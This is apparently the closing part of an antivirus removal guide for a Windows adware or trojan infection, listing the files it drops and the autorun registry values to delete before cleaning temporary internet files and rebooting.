%Documents and Settings%\%current user%\Local Settings\Application Data\apqPAyENSREpdiRdy4l7PC.html (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\ckkkp[1].htm (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\qPAyENSREpdiRdy4l7PC.html (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\localhost[1].htm (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\ckkk[1].htm (303 bytes)
C:\a\1loogg2.txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\System.dll (11 bytes)
C:\a\1logff.txt (717 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB.tmp\nsC.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aqPAyENSREpdiRdy4l7PC.html (303 bytes)
C:\a\vv11111.txt (22012 bytes)
C:\a\avv.txt (2896 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuA.tmp\System.dll (11 bytes)
C:\a\auur.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\uur[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuA.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuA.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\vv[1].htm (2896 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\vchk[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp\System.dll (11 bytes)
C:\a\FiddlerCore.dll (9485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\pwgen.dll (17 bytes)
C:\a\zuur.txt (2 bytes)
C:\a\internetport3.exe (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\cki[1].htm (11 bytes)
C:\a\wcheckf.exe (397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\uniqueqPAyENSREpdiRdy4l7PC[1].htm (10 bytes)
C:\a\zhho.txt (3 bytes)
C:\a\qPAyENSREpdiRdy4l7PC.exe (3808 bytes)
C:\a\zvchk.txt (3 bytes)
%Program Files%\FastInternet\app.exe (1078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\bdcount[1].htm (8 bytes)
C:\a\winonit.exe (435 bytes)
C:\a\ayyyyy.txt (11 bytes)
%Program Files%\FastInternet\dotuninstall.exe (1084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\qPAyENSREpdiRdy4l7PC[1].exe (3808 bytes)
C:\a\ukey.ini (27 bytes)
%System%\3215049.bat (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
C:\a\zvv.txt (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\SimpleFC.dll (5289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\inetc.dll (20 bytes)
C:\a\ver.ini (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\UAC.dll (13 bytes)
C:\a\getcap.exe (10027 bytes)
C:\a\3cMmvL8egY.exe (5873 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\intr.lnk (527 bytes)
C:\a\73941422.bat (287 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\AccessControl.dll (13 bytes)
C:\a\wincheckfe.exe (778 bytes)
C:\a\uniqueqPAyENSREpdiRdy4l7PC.ini (10 bytes)
C:\a\install.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2E.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\vchk[1].htm (1946 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns15.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns17.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns27.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns25.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns19.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns12.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns31.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns34.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns20.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns22.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns33.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns28.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns21.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns16.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns11.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns29.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns30.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns39.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns32.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns38.tmp (6 bytes)
C:\a\avchk.txt (1946 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns14.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1E.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns13.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns3E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns18.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns26.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns1D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns23.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns37.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns35.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns24.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns36.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp\ns2F.tmp (6 bytes)
C:\a\7za.exe (15192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsnE.tmp\System.dll (11 bytes)
C:\a\logff.txt (717 bytes)
C:\a\loogg2.txt (240 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"interpee" = "C:\a\internetport3.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"dutoauto" = "C:\a\wincheckfe.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cutoauto" = "C:\a\wincheckfe.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"interpee" = "C:\a\internetport3.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"autoauto" = "3215049.bat"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"rutoauto" = "3215049.bat"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.